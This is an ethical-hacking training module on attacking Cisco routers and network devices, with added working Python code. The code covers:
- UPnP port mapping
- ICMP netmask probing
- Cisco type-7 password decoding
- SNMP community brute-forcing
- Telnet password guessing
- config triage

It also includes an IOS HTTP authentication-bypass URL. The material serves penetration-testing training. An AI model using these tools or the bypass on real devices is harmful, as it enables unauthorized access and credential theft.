
CEHv6 Module 35: Hacking Routers, Cable Modems, and Firewalls


DOCUMENT INFORMATION

Basic information

Title: Hacking Routers, Cable Modems, and Firewalls
Institution: EC-Council
Subject: Information Security
Type: training module
Format:
Pages: 62
Size: 2.31 MB


Contents


Ethical Hacking and Countermeasures Version 6

Module XXXV: Hacking Routers, Cable Modems, and Firewalls

Exam 312-50

Attackers make use of Universal Plug and Play (UPnP), a feature built into home routers. UPnP does not use any authentication. Using a web page that targets version 8 or higher of Adobe Flash, an attacker can change which PCs behind the router are exposed as servers, open ports on a victim's router, and change the router's settings. UPnP is turned on by default on most routers; it should be turned off to prevent these kinds of attacks.
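To make the "no authentication" point concrete, here is an added example (not code from the EC-Council module) that builds the SOAP request an Internet Gateway Device accepts for AddPortMapping and parses one back out of a captured body. The element names come from the UPnP WANIPConnection:1 service description; the addresses and ports are constructed. The Flash-in-a-browser delivery the module refers to is simply a way of getting this same request sent from a machine inside the victim's LAN.

```python
"""UPnP IGD AddPortMapping: the unauthenticated request an attacker sends, and a
router-side check that would stop the 'open ports on another host' case.

Added example; not part of the EC-Council module.  Field names follow the UPnP
WANIPConnection:1 service; the IP addresses and ports used are constructed.
"""
import xml.etree.ElementTree as ET

NS_SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
NS_WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
FIELDS = ("NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort",
          "NewInternalClient", "NewEnabled", "NewPortMappingDescription",
          "NewLeaseDuration")


def build_add_port_mapping(external_port, internal_client, internal_port,
                           protocol="TCP", description="added example", lease=0):
    """Return (headers, body) for an AddPortMapping SOAP call.  Note there is no
    credential anywhere in it: reaching the control URL is all the router requires."""
    values = {
        "NewRemoteHost": "", "NewExternalPort": str(external_port),
        "NewProtocol": protocol, "NewInternalPort": str(internal_port),
        "NewInternalClient": internal_client, "NewEnabled": "1",
        "NewPortMappingDescription": description, "NewLeaseDuration": str(lease),
    }
    args = "".join("<%s>%s</%s>" % (f, values[f], f) for f in FIELDS)
    body = ('<?xml version="1.0"?>'
            '<s:Envelope xmlns:s="%s" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            '<s:Body><u:AddPortMapping xmlns:u="%s">%s</u:AddPortMapping></s:Body>'
            '</s:Envelope>') % (NS_SOAP, NS_WANIP, args)
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": '"%s#AddPortMapping"' % NS_WANIP}
    return headers, body


def parse_add_port_mapping(body):
    """Extract the mapping arguments from a captured request body.
    Returns None when the body is not an AddPortMapping call."""
    root = ET.fromstring(body)
    action = root.find("./{%s}Body/{%s}AddPortMapping" % (NS_SOAP, NS_WANIP))
    if action is None:
        return None
    return {child.tag: (child.text or "") for child in action}


def is_suspicious(mapping, requester_ip):
    """True when the mapping exposes a host other than the one asking for it.
    A router that enforced this would block the 'open ports on another machine'
    case; most consumer IGDs do not, which is why the module says to disable UPnP."""
    return mapping["NewInternalClient"] != requester_ip
```

In a real exchange the body goes in an HTTP POST to the control URL advertised in the router's device description (found via SSDP); the headers dict is what that POST carries.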

Module Flow

• Analyzing the Router Config
• Cracking the Enable Password
• Pen-Testing Tools
• Cable Modem Hacking
• Bypassing Firewalls

Routers

According to searchnetworking.techtarget.com, a router is a device or, in some cases, software in a computer, that determines the next network point to which a packet should be forwarded toward its destination in packet-switched networks such as the Internet. A router may create or maintain a table of the available routes and their conditions and use this information, along with distance and cost algorithms, to determine the best route for a given packet.

Modems

A modem (MOdulator/DEModulator) is a device that converts digital signals to analog signals, and vice versa. The signals from the computer are digital, and the signals carried over telephone lines are analog; the modem performs this conversion. Modulation is applied to the data before sending, and demodulation after receiving.

Cable Modems

A cable modem is a device that connects a computer to a cable TV line. It has two connections (a cable wall outlet and a connection to the PC), comes in internal and external models, and can receive data at a rate of 1.5 Mbps. It attaches to a standard 10BASE-T Ethernet card in the computer. The key components of a cable modem are:

• Microprocessor
• Demodulator/Modulator
• Tuner (for fine tuning)
• Media access control (MAC) device

Firewall

Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Hacking Routers

The easiest way to identify a router on a network is with Nmap. Nmap is a versatile port scanner that does very accurate OS fingerprinting.

Figure: Port Scanning of a Cisco Router

Identify Router

Source: http://www.securityfocus.com/infocus/1734

Routers can be configured to look just like any other system on the network. They can run a web server, an SSH daemon, chargen, and they can even appear to be running multiple X servers. The common way to identify a router is to use Nmap, a port scanner that gives accurate OS fingerprinting. Below is the port scan of a typical Cisco router:

Using a login service such as Telnet or SSH, connect to the appropriate port with a standard client. A basic Cisco router login banner will look like this:

SING: Tool for Identifying the Router

Source: http://linux.softpedia.com/

SING stands for 'Send ICMP Nasty Garbage'. SING is a command line tool that sends customized ICMP packets. Among the ICMP types it can send is the netmask (address mask) request, ICMP type 17. Routers are the devices that typically reply to this type of ICMP packet, so an address mask reply (type 18) is a useful indicator that the responding address belongs to a router. A host only answers mask requests when configured to do so (on Cisco IOS this is the ip mask-reply interface command, which is off by default), so silence does not prove there is no router at that address.

Features:

• Sends fragmented packets (Linux and BSD)
• Sends monster packets > 65534 bytes (Linux and BSD)
• Sends/reads IP-spoofed packets
• Sends/reads Ethernet-spoofed packets
• Sends many ICMP information types in addition to the ECHO REQUEST type sent by default: Address Mask Request, Timestamp, Information Request, Router Solicitation, and Router Advertisement
• Sends many ICMP error types: Redirect, Source Quench, Time Exceeded, Destination Unreachable, and Parameter Problem
• Sends to a host with loose or strict source routing
• Uses fingerprinting techniques to discover the remote OS
• Sends ICMP packets emulating certain OSs: Cisco, Solaris, Linux, Shiva, Unix, and Windows

Figure: Output of the SING Command
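What SING's netmask probe actually puts on the wire, as an added example that is not SING's code: the 12-byte ICMP Address Mask Request (type 17) with its RFC 1071 checksum, a parser for the type-18 reply, and a raw-socket sender for live use. The reply bytes used below are constructed to stand in for a router that has been configured to answer mask requests; the raw-socket sender needs CAP_NET_RAW and is not exercised offline.

```python
"""ICMP Address Mask Request (17) / Reply (18), the probe SING sends.

Added example; not SING's own code.  The constructed reply stands in for a
router that answers mask requests, which only happens when the device is set
up to do so (the 'ip mask-reply' interface command on Cisco IOS).
"""
import socket
import struct

ICMP_MASK_REQUEST = 17
ICMP_MASK_REPLY = 18
_HDR = "!BBHHHI"   # type, code, checksum, identifier, sequence, address mask


def icmp_checksum(data):
    """RFC 1071 one's-complement sum.  Over a packet whose checksum field is already
    correct this returns 0, which is how the reply is validated below."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_mask_request(ident, seq):
    """12-byte address mask request; the mask field is zero in a request."""
    csum = icmp_checksum(struct.pack(_HDR, ICMP_MASK_REQUEST, 0, 0, ident, seq, 0))
    return struct.pack(_HDR, ICMP_MASK_REQUEST, 0, csum, ident, seq, 0)


def build_mask_reply(ident, seq, mask):
    """What a responding router sends back (used here to construct test input)."""
    mask_int = struct.unpack("!I", socket.inet_aton(mask))[0]
    csum = icmp_checksum(struct.pack(_HDR, ICMP_MASK_REPLY, 0, 0, ident, seq, mask_int))
    return struct.pack(_HDR, ICMP_MASK_REPLY, 0, csum, ident, seq, mask_int)


def parse_mask_reply(pkt, ident):
    """Return the dotted netmask from a type-18 reply that matches our identifier
    and carries a valid checksum; None for anything else."""
    if len(pkt) < 12:
        return None
    typ, code, _, rid, _, mask_int = struct.unpack(_HDR, pkt[:12])
    if typ != ICMP_MASK_REPLY or code != 0 or rid != ident:
        return None
    if icmp_checksum(pkt[:12]) != 0:   # corrupt or forged
        return None
    return socket.inet_ntoa(struct.pack("!I", mask_int))


def send_mask_request(target, ident=0x5347, seq=1, timeout=2.0):
    """Live probe (requires CAP_NET_RAW).  Returns the netmask, or None on silence."""
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    s.settimeout(timeout)
    try:
        s.sendto(build_mask_request(ident, seq), (target, 0))
        data, _ = s.recvfrom(1024)
    except socket.timeout:
        return None
    finally:
        s.close()
    ihl = (data[0] & 0x0F) * 4   # raw sockets hand back the IPv4 header too; skip it
    return parse_mask_reply(data[ihl:], ident)
```

The identifier check matters on a busy host: the kernel delivers every ICMP message to a raw socket, so a reply is only attributed to this probe when its identifier matches.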

The router is the most crucial component in the infrastructure of the Internet. It is the backbone of any network infrastructure. For this reason, the router is becoming the primary target of any attacker trying to intrude on or attack a particular network.

Vulnerability scanners typically do a great job of identifying known vulnerabilities, but can often miss significant configuration errors. For example, Nessus has a list of about 44 community strings to brute-force the SNMP daemon, which may be enough to catch the use of common default community strings such as public and private, but cannot take into account site-specific strings that might be in use. As with most penetration tests, vulnerability scanners can be a good start, but are simply inadequate in matching the human element that goes into a penetration test. Some vulnerability scanners are:

• X-scan
• SAINT
• Retina
• MBSA

Exploiting Vulnerabilities in Cisco IOS

HTTP Configuration Arbitrary Administrative Access Vulnerability

Arbitrary commands can be executed on a remote Cisco router by sending an HTTP request of the form:

/level/$NUMBER/exec/show/config/cr

where $NUMBER is an integer between 16 and 99. The request is served without the HTTP authentication prompt being satisfied, at the privilege level named in the URL.

An attacker can use this to cut off network access and can even lock users out of the router.

This vulnerability can yield full remote administrative control of the affected router.

HTTP Configuration Arbitrary Administrative Access Vulnerability (cont'd)

The attacker opens a browser and points it at the vulnerable router. A prompt like this appears:

Figure: Cisco Router HTTP Basic Authentication Prompt

HTTP Configuration Arbitrary Administrative Access Vulnerability (cont'd)

Countermeasure: disable the web configuration interface completely.

Figure: Cisco Router HTTP Basic Authentication Prompt

After clicking the Cancel button, the pen tester enters the following URL into the address bar: http://10.0.1.252/level/99/exec/show/config, and is presented with the startup configuration of the device.

Figure: Cisco Router Config Displayed

The configuration of the target router can be seen in the web browser: the router configuration, interfaces, Access Control Lists (ACLs), and SNMP community strings. To represent a password in an IOS config file, any of the three methods given below is used:

• Clear text: enable password
• Vigenere (type 7): enable password 7 104B0718071B17
• MD5 (type 5): enable secret 5 $1$yOMG$38ZIcsEmMaIjsCyQM6hya0

In the example, the network administrator chose the Vigenere-style type 7 encoding, which is an easily reversed encryption scheme; it can be cracked with the help of the GetPass tool. Only the MD5 enable secret has to be attacked with a dictionary or brute-force attack.

Figure: Decrypting a Vigenere Password

After cracking the password, the pen tester logs in via Telnet and gains complete administrative control of the router.
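The decoding step the module performs with GetPass, as an added example that is neither the module's nor GetPass's code. Cisco documents type 7 as a Vigenère-style reversible encoding; what it actually is is XOR against a fixed key string, with the first two decimal digits of the stored value selecting the starting offset into that key. The value tested below is the one shown in the module's config excerpt, and the encoder is included only to show that the scheme is symmetric.

```python
"""Reversing a Cisco 'password 7' string, the step the module performs with
GetPass once the config has been pulled over HTTP.

Added example; not the module's or GetPass's code.  Type 7 is a fixed-key XOR:
the first two decimal digits give the starting offset into a constant key and
every following hex pair is XORed with the next key byte.  The sample string
is the one shown in the module's config excerpt."""
import re

XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"   # the constant key IOS uses
TYPE7_RE = re.compile(r"\b(?:password|key)\s+7\s+([0-9A-Fa-f]+)")


def decode_type7(encoded):
    """Return the plaintext for a type-7 string; raise ValueError if it is malformed."""
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("not a type 7 string: %r" % encoded)
    seed = int(encoded[:2])
    if seed > 15:                       # IOS does not produce seeds above 15
        raise ValueError("seed out of range: %d" % seed)
    out = bytearray()
    for i, pos in enumerate(range(2, len(encoded), 2)):
        out.append(int(encoded[pos:pos + 2], 16) ^ XLAT[(seed + i) % len(XLAT)])
    return out.decode("ascii")          # UnicodeDecodeError (a ValueError) on garbage


def encode_type7(plain, seed=10):
    """The forward direction, to show the scheme is symmetric: same key, same XOR."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be 0..15")
    return "%02d" % seed + "".join("%02X" % (c ^ XLAT[(seed + i) % len(XLAT)])
                                   for i, c in enumerate(plain.encode("ascii")))


def find_type7_in_config(config_text):
    """Yield (config line, plaintext) for every 'password 7' / 'key 7' line in an IOS config."""
    for line in config_text.splitlines():
        m = TYPE7_RE.search(line)
        if m:
            yield line.strip(), decode_type7(m.group(1))
```

Because the key is public and the transformation is a plain XOR, there is nothing to brute-force: every type-7 value in a leaked config is recovered instantly, which is why the enable secret (type 5) is the only password line that actually costs the attacker effort.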


Brute-Forcing Services


Figure: Management Information Base


Scanner: ADMsnmp

Source: http://www.freshports.org/security/ADMsnmp/

ADMsnmp is an snmpd audit scanner. ADMsnmp can brute-force the SNMP community name (with a word file) or make a word file list derived from the hostname. ADMsnmp reports all valid community names found and informs you whether writable access to the MIB has been attained.

Figure: ADMsnmp Guessing a Read/Write Community String

The "send setrequest" string reveals that the user has gained read/write privileges on the device. An attacker reads the MIB (Management Information Base) after obtaining this higher level of privilege.
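What a community-string guess like ADMsnmp's consists of, as an added example that is not ADMsnmp's code: an SNMPv1 GetRequest for sysDescr.0 is sent with each candidate community, and a GetResponse carrying our request-id proves the string is valid. An SNMPv1 agent simply discards a request whose community is wrong, so silence is the failure signal and a timeout per candidate is unavoidable on a real network. The BER encoding follows RFC 1157; the agent simulated here, its community string and its sysDescr text are constructed.

```python
"""SNMPv1 community-string guessing, the operation ADMsnmp performs.

Added example, not ADMsnmp's code.  Encoding follows RFC 1157 BER; the agent
simulated below, its community string and its sysDescr text are constructed.
"""
SYS_DESCR_OID = (1, 3, 6, 1, 2, 1, 1, 1, 0)


def _ber_len(n):                       # BER length: short form < 128, long form otherwise
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def _ber_int(v):                       # minimal two's-complement INTEGER (non-negative here)
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))


def _ber_oid(arcs):                    # first two arcs share one byte, the rest are base-128
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        while a >= 0x80:
            a >>= 7
            chunk.append(0x80 | (a & 0x7F))
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def _decode(buf, pos=0):
    """Minimal BER reader: SEQUENCE/GetRequest/GetResponse become (tag, [children]),
    primitives become (tag, bytes).  Returns (node, end offset)."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    body, end = buf[pos:pos + ln], pos + ln
    if tag in (0x30, 0xA0, 0xA2):
        items, p = [], 0
        while p < len(body):
            item, p = _decode(body, p)
            items.append(item)
        return (tag, items), end
    return (tag, bytes(body)), end


def _oid_str(raw):
    arcs, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def build_get_request(community, request_id, oid=SYS_DESCR_OID):
    varbinds = _tlv(0x30, _tlv(0x30, _ber_oid(oid) + b"\x05\x00"))   # NULL value in a request
    pdu = _tlv(0xA0, _ber_int(request_id) + _ber_int(0) + _ber_int(0) + varbinds)
    return _tlv(0x30, _ber_int(0) + _tlv(0x04, community.encode()) + pdu)   # version 0 = SNMPv1


def parse_message(packet):
    """Return (community, pdu_tag, request_id, {oid: value bytes}); None if not SNMPv1 or on error-status."""
    (tag, msg), _ = _decode(packet)
    if tag != 0x30 or len(msg) != 3 or msg[0][1] != b"\x00":
        return None
    community, (pdu_tag, pdu) = msg[1][1].decode(), msg[2]
    if int.from_bytes(pdu[1][1], "big", signed=True) != 0:
        return None
    binds = {_oid_str(o[1]): v[1] for _, (o, v) in pdu[3][1]}
    return community, pdu_tag, int.from_bytes(pdu[0][1], "big", signed=True), binds


def simulated_agent(valid_communities, sys_descr=b"Cisco IOS Software (constructed)"):
    """Stand-in for a device: answers a GetRequest only when the community is known."""
    def respond(packet):
        parsed = parse_message(packet)
        if parsed is None or parsed[1] != 0xA0 or parsed[0] not in valid_communities:
            return None
        community, _, req_id, binds = parsed
        vb = b"".join(_tlv(0x30, _ber_oid(tuple(int(x) for x in oid.split("."))) + _tlv(0x04, sys_descr))
                      for oid in binds)
        pdu = _tlv(0xA2, _ber_int(req_id) + _ber_int(0) + _ber_int(0) + _tlv(0x30, vb))
        return _tlv(0x30, _ber_int(0) + _tlv(0x04, community.encode()) + pdu)
    return respond


def derive_candidates(hostname, base=("public", "private")):
    """Word list in the spirit of ADMsnmp's hostname-derived list (defaults tried first)."""
    h = hostname.split(".")[0]
    guesses = [h, h.lower(), h.upper(), h + "public", h + "private", h + "1", h + "123"]
    return list(dict.fromkeys(list(base) + guesses))


def brute_force(send, candidates):
    """Return the first community the agent answers for (matching request-id), else None."""
    for req_id, community in enumerate(candidates, 1):
        reply = send(build_get_request(community, req_id))
        parsed = parse_message(reply) if reply else None
        if parsed and parsed[1] == 0xA2 and parsed[2] == req_id:
            return community
    return None
```

For a live target, `send` is a function that writes the bytes to UDP/161 and returns whatever arrives before a short timeout (or None). Confirming write access, which is what ADMsnmp's "send setrequest" does, is a SetRequest (tag 0xA3) against a harmless object such as sysContact.0 and is deliberately left out here.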

After identifying that the device is a router running Cisco IOS, the attacker has the router send its config file to his/her system through TFTP, using the following command:


SolarWinds MIB Browser

Source: http://www.solarwinds.com/products/toolsets/MIBBrowser.aspx

The MIB Browser utilizes SolarWinds' extensive MIB (Management Information Base) database of more than a thousand standard and proprietary MIBs. It is a fundamental tool for network engineers: it allows an engineer to query a remote device for its software and hardware configuration via SNMP, and also to make changes to the remote device. The remote device could be a router, switch, hub, server, firewall, or any other device that supports SNMP.

SolarWinds MIB Browser is used when SNMP is the only mechanism available for accessing the device. With SolarWinds, the MIB can be browsed. It contains the vendors' standard MIBs for an astounding number of different operating systems and devices, and one can set several configuration items using the Cisco generic MIB.

Brute-Forcing Login Services

Brute-forcing login services often yields positive results for the pen tester. Before attac­king the router, determine whether it is using an extended authentication mechanism such as TACACS or RADIUS: connect with a standard Telnet client and see what the device prompts for. If it prompts for a username, it is using some additional authentication mechanism; with TACACS in place, brute-forcing becomes more difficult, since the pen tester has to guess both the username and the password instead of only the password. With standard Telnet, the client can tell whether authentication passed or not.

Tools used for brute-forcing login services:

Source: http://securitytnt.com/hydra/#more-197

Hydra is a parallelized login cracker that supports numerous protocols. Hydra brute-forces the following: FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, Socks5, and PCNFS.
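The two checks above (what the device prompts for, and whether a guess was accepted), as an added example that is not Hydra's code. The simulated router, its banner and its password are constructed; it mimics a Cisco IOS vty protected by a line password, which reports "% Bad passwords" and drops the connection after three failures, so the loop has to reconnect rather than give up.

```python
"""Password-only versus username+password login, and a guessing loop that
survives IOS closing the session after three bad passwords.

Added example; not Hydra's code.  The simulated router below, its banner and
its password are constructed.  For a live run, replace it with a socket to
port 23 that feeds the same prompt text into detect_auth_mode().
"""
import re


def detect_auth_mode(banner):
    """'aaa' when the device asks for a username (TACACS+, RADIUS or local users),
    'line' for a bare 'Password:' prompt, None if no login prompt is visible."""
    if re.search(r"\bUsername:", banner):
        return "aaa"
    if re.search(r"\bPassword:", banner):
        return "line"
    return None


class SimulatedRouter:
    """Mimics an IOS vty with a line password: after three failures the device
    prints '% Bad passwords' and disconnects."""
    MAX_TRIES = 3

    def __init__(self, password, banner="User Access Verification\n\nPassword: "):
        self._password, self._banner = password, banner
        self.connections = 0

    def connect(self):
        self.connections += 1
        return _Session(self)


class _Session:
    def __init__(self, router):
        self._r, self._tries, self.open = router, 0, True

    def read_banner(self):
        return self._r._banner

    def send_password(self, candidate):
        """Return 'ok', 'bad' or 'closed' (the device dropped the connection)."""
        if not self.open:
            return "closed"
        self._tries += 1
        if candidate == self._r._password:
            return "ok"
        if self._tries >= SimulatedRouter.MAX_TRIES:
            self.open = False           # third wrong guess: '% Bad passwords', disconnect
            return "closed"
        return "bad"


def guess_line_password(router, wordlist):
    """Try each candidate, reconnecting whenever the device drops us.
    Returns (password or None, number of attempts made)."""
    session, attempts = router.connect(), 0
    if detect_auth_mode(session.read_banner()) != "line":
        raise RuntimeError("device prompts for a username; guess user/password pairs instead")
    for candidate in wordlist:
        if not session.open:
            session = router.connect()
        attempts += 1
        result = session.send_password(candidate)
        if result == "ok":
            return candidate, attempts
        # 'bad' or 'closed': the candidate was tested and rejected either way
    return None, attempts
```

On a real device each reconnect costs a TCP handshake and the banner round trip, and AAA-backed routers may additionally throttle or lock after repeated failures, which is where a tool like Hydra's parallel sessions and per-task delays come in.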

Analyzing the Router Config

Figure: Router Config file

Once the router's login has been brute-forced, the config file can be read with ease. Config files give a penetration tester a lot of information. Attackers can use the information gained from the config file to:

• Find new targets
• Find sensitive systems and information
• Identify networks by analyzing ACLs
• Learn passwords

A sample router configuration looks like this:
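The module's sample configuration is a figure and is not reproduced here. As an added example (not the module's code), the parser below does the triage the four bullets describe on a constructed IOS config: it reuses the two enable lines and the 10.0.1.252 address shown in the module, and everything else in the sample is invented for the demonstration. Type-7 values are only classified, not decoded.

```python
"""Triage of a captured IOS configuration: interfaces, networks named in ACLs,
SNMP community strings and how each password is stored.

Added example; the config below is constructed except for the two enable
lines and the 10.0.1.252 address, which come from the module.
"""
import ipaddress
import re

SAMPLE_CONFIG = """\
hostname edge-rtr1
enable secret 5 $1$yOMG$38ZIcsEmMaIjsCyQM6hya0
enable password 7 104B0718071B17
username admin password 0 admin123
interface FastEthernet0/0
 ip address 10.0.1.252 255.255.255.0
 ip access-group 101 in
interface Serial0/0
 ip address 192.0.2.2 255.255.255.252
access-list 101 permit tcp 198.51.100.0 0.0.0.255 host 10.0.1.10 eq 22
access-list 101 permit ip 192.0.2.0 0.0.0.3 any
access-list 101 deny ip any any
snmp-server community public RO
snmp-server community private RW
line vty 0 4
 password 7 104B0718071B17
 login
"""

PASSWORD_RE = re.compile(r"^\s*(?P<ctx>enable secret|enable password|username \S+ password|password)"
                         r"\s+(?:(?P<type>\d)\s+)?(?P<value>\S+)\s*$")
STORAGE = {None: "cleartext", "0": "cleartext", "7": "type 7, reversible",
           "5": "type 5 (MD5), needs a dictionary or brute-force attack"}


def _acl_endpoint(tokens):
    """Consume one ACL address spec (any | host A | A WILDCARD); return (network or None, rest)."""
    if tokens[0] == "any":
        return None, tokens[1:]
    if tokens[0] == "host":
        return ipaddress.ip_network(tokens[1] + "/32"), tokens[2:]
    wildcard = int(ipaddress.ip_address(tokens[1]))
    prefix = 32 - wildcard.bit_length()             # assumes a contiguous wildcard mask
    return ipaddress.ip_network("%s/%d" % (tokens[0], prefix), strict=False), tokens[2:]


def parse_config(text):
    info = {"hostname": None, "interfaces": {}, "acls": [], "snmp": {}, "passwords": []}
    current = None
    for line in text.splitlines():
        t = line.split()
        if not t:
            continue
        if t[0] == "hostname":
            info["hostname"] = t[1]
        elif t[0] == "interface":
            current = t[1]
            info["interfaces"].setdefault(current, {})
        elif line.startswith(" ip address") and current:
            info["interfaces"][current]["address"] = str(ipaddress.ip_interface("%s/%s" % (t[2], t[3])))
        elif line.startswith(" ip access-group") and current:
            info["interfaces"][current]["acl_" + t[3]] = t[2]
        elif t[0] == "access-list" and t[2] in ("permit", "deny"):
            src, rest = _acl_endpoint(t[4:])
            dst, rest = _acl_endpoint(rest)
            port = rest[1] if rest[:1] == ["eq"] else None
            info["acls"].append({"number": t[1], "action": t[2], "proto": t[3],
                                 "src": src, "dst": dst, "port": port})
        elif t[0] == "snmp-server" and t[1] == "community":
            info["snmp"][t[2]] = t[3].upper() if len(t) > 3 else "RO"   # RO is the IOS default
        else:
            m = PASSWORD_RE.match(line)
            if m:
                ptype = m.group("type")
                info["passwords"].append({"context": m.group("ctx"), "value": m.group("value"),
                                          "storage": STORAGE.get(ptype, "type %s" % ptype)})
    return info


def targets_from_acls(info):
    """Networks and hosts the ACLs reveal (the 'identify networks by analyzing ACLs' step)."""
    return sorted({str(e[k]) for e in info["acls"] for k in ("src", "dst") if e[k] is not None})


def weak_credentials(info):
    """Passwords usable without cracking (cleartext or type 7) and read/write SNMP communities."""
    weak = [p for p in info["passwords"] if not p["storage"].startswith("type 5")]
    rw = [c for c, mode in info["snmp"].items() if mode == "RW"]
    return weak, rw
```

Run against a real config, the ACL networks are the first hop for the "identify new targets" step, and the RW community string is the same level of access the ADMsnmp section reaches by guessing.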


Cracking the Enable Password

The enable secret is stored as an MD5 hash (type 5). A dictionary attack can be used to crack it with the help of the following tools:

• John the Ripper: the hash is placed in an /etc/shadow-style file and John is run against it
• Cain and Abel: capable of conducting both brute-force and dictionary attacks on Cisco MD5 hashes

Figure: Cain and Abel

After cracking the password, the pen tester can attempt to log into the device, completely disable an ACL, and obtain router config information. An attacker can add his/her own rule that allows logging in, or disable the ACL that prevents direct login. Before modifying anything in the router, analyze the router config. Once logged into the router, the pen tester tries to find out what other systems he can reach, using both traceroute and telnet from the router to explore the internal network.


Attacking Routers

Implications of a Router Attack

The router is a crucial network component; it is the framework/backbone of any network infrastructure. This is the reason the router becomes the primary target of any attacker trying to intrude on or attack a particular network. If an intruder takes control of the router, the network behind it can be subjected to various attacks. An intruder who controls a router can:

• Gain knowledge of all the possible vulnerabilities in the network
• Interrupt communication by dropping or misrouting packets passing through the router
• Completely disable the router and its network
• Compromise other routers in the network and possibly also neighboring networks
• Observe and log both incoming and outgoing traffic
• Bypass firewalls and intrusion detection systems
• Forward any kind of traffic to the compromised network

Types of Router Attacks

The most common and prevalent router attacks are:

1. Denial-of-Service attacks
2. Packet mistreating attacks
3. Routing table poisoning
4. Flooding
5. Hit-and-run attacks
6. Persistent attacks

Router Attack Topology

Denial-of-Service (DoS) Attacks

In a Denial-of-Service (DoS) attack, an attacker overloads the router's resources and makes it inaccessible, thus making the router unusable for network traffic. If an attacker is unable to gain access to a machine, the attacker will most probably just crash it by flooding the router, accomplishing a denial of service.

The attacker floods the network with malicious packets, thus preventing authorized network traffic. Once the attacker has succeeded in carrying out a DoS attack, he/she may also maliciously modify configuration or routing information.

A DoS attack may take one of three forms:

1. Destruction: these attacks damage the capability of the router to operate.
2. Resource utilization: these attacks are achieved by overflowing the router with numerous open connections at the same time.
3. Bandwidth consumption: these attacks attempt to use up the bandwidth capacity of the router's network.

Packet "Mistreating" Attacks

In these attacks, a compromised router mishandles or mistreats packets, resulting in congestion and similar problems. These attacks are very complicated to detect, but they have restricted effectiveness compared to routing table poisoning and DoS attacks, since the damage is confined to a part of the network rather than the whole network.

The attacker carrying out a packet mistreating attack acquires an actual data packet and mistreats it. The malicious packet can lead to:

• Denial of service: caused indirectly by directing an overwhelming number of packets to the victim's address, making the victim router and its network inaccessible to regular traffic.
• Congestion: occurs when packets are directed toward a wrong route over already heavily loaded links of the network.
• Lowered connection throughput: the attacker can decrease throughput by preventing TCP packets from being forwarded further. The victim router, sensing congestion, lowers its sending rate, resulting in a decrease in connection throughput.

Posted: 26/12/2013, 20:57
